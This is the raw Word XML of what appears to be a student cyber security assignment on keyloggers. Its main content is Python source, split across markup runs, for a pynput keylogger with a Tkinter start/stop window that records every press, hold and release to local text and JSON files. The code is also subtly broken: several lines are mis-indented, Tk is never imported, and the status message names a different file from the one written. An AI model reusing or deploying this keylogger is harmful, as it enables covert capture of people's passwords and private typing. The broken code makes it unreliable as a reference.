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7E463A40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TOPIC  :  KEYLOGGER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3F8D5AF0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6F1296">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">K.T.JENEFER </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7539B2D3" w14:textId="22BBEF8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2</w:t>
      </w:r>
      <w:r w:rsidR="006F1296">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5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COLLEGE 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COLLEGE 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 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2B7A0E58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 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106FC8E1" w:rsidR="00557B18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sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>CYBER SECURITY (E2324)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CBAEA4" w14:textId="4D27F1B0" w:rsidR="00FF47FA" w:rsidRPr="00FF47FA" w:rsidRDefault="00FF47FA" w:rsidP="00557B18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF47FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">      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7E13567C" w14:textId="5D7381A0" w:rsidR="00557B18" w:rsidRPr="001F378E" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E9CE01" w14:textId="14BF2470" w:rsidR="00557B18" w:rsidRPr="00C83DD9" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C83DD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00C70B8F" w:rsidRPr="00C83DD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ODING</w:t>
      </w:r>
      <w:r w:rsidR="00DA032D" w:rsidRPr="00C83DD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290D90D" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18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59E395A6" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18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0AF0D78D" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5489F252" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B22132C" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75466196" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t>flag = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281AB932" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t>keys = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F76D4" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>generate_text_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE5751" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    with open('key_log.txt', "w+") as keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E289005" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A089A" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>generate_json_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5898CE4A" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    with open('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key_log.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', '+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">') as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EDE9F" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key_list_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).encode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F6FA0" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key_log.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key_list_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0A1C53" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED75C4" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    global flag, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCBC356" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    if flag == False:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1179A2" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127408F5" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">            {'Pressed': f'{key}'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08884EF6" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049F06E" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        flag = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99AD96" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    if flag == True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A536A0" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D5784" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">            {'Held': f'{key}'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C83300E" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD75F68" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>generate_json_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5473D5D9" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADFC117" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    global flag, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF98B2" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91E2EC" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t>{'Released': f'{key}'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB2DC2" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED743E4" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t>if flag == True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354688E" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">        flag = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BEA8C" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>generate_json_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA1EA54" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t>keys = keys + str(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A780D2" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>generate_text_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(keys))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005A5C5" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B55A39" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    global listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F530683" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    listener = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyboard.Listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2DA635" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listener.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E1831" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>label.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(text="[+] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is running!\n[!] Saving the keys in 'keylogger.txt'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300300F2" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_button.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(state='disabled')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E480207" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stop_button.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(state='normal')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B82B6A3" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stop_keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A55ADD" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    global listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729BAD58" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listener.stop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955F9BC" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>label.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(text="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stopped.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A895F" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_button.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(state='normal')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654E6D0" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stop_button.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(state='disabled')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227A995" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t>root = Tk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A181E3" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root.title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D00A340" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:t>label = Label(root, text='Click "Start" to begin keylogging.')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C83BA85" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>label.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(anchor=CENTER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74976C49" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>label.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702222E7" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_button</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = Button(root, text="Start", command=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1F7D2" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_button.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(side=LEFT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD0F87" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stop_button</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = Button(root, text="Stop", command=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stop_keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, state='disabled')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12397886" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stop_button.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(side=RIGHT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D17549" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root.geometry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("250x250")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D4BBC" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root.mainloop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169F3973" w14:textId="77777777" w:rsidR="00557B18" w:rsidRPr="00AB7321" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7321">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756BB58F" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:p w14:paraId="40212569" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6661D889" wp14:editId="32C0D510">
            <wp:extent cx="5778035" cy="2945244"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="51524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010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8035" cy="29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DBA" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:p w14:paraId="210C7795" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:p w14:paraId="76544EE4" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:p w14:paraId="1B6370C6" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:p w14:paraId="50EA1DCA" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:p w14:paraId="4085C19F" w14:textId="77777777" w:rsidR="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:p w14:paraId="364BF766" w14:textId="345CE066" w:rsidR="00557B18" w:rsidRPr="00557B18" w:rsidRDefault="00557B18" w:rsidP="00557B18"/>
    <w:sectPr w:rsidR="00557B18" w:rsidRPr="00557B18" w:rsidSect="00C7153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F4AD5"/>
    <w:rsid w:val="001F378E"/>
    <w:rsid w:val="00242ACF"/>
    <w:rsid w:val="00342E22"/>
    <w:rsid w:val="004267E6"/>
    <w:rsid w:val="00461090"/>
    <w:rsid w:val="0048417C"/>
    <w:rsid w:val="00557B18"/>
    <w:rsid w:val="006C328E"/>
    <w:rsid w:val="006F1296"/>
    <w:rsid w:val="007469B6"/>
    <w:rsid w:val="00AB7321"/>
    <w:rsid w:val="00AD4097"/>
    <w:rsid w:val="00AE42DB"/>
    <w:rsid w:val="00C54E53"/>
    <w:rsid w:val="00C6528F"/>
    <w:rsid w:val="00C70B8F"/>
    <w:rsid w:val="00C71536"/>
    <w:rsid w:val="00C83DD9"/>
    <w:rsid w:val="00CC40A0"/>
    <w:rsid w:val="00CD05CC"/>
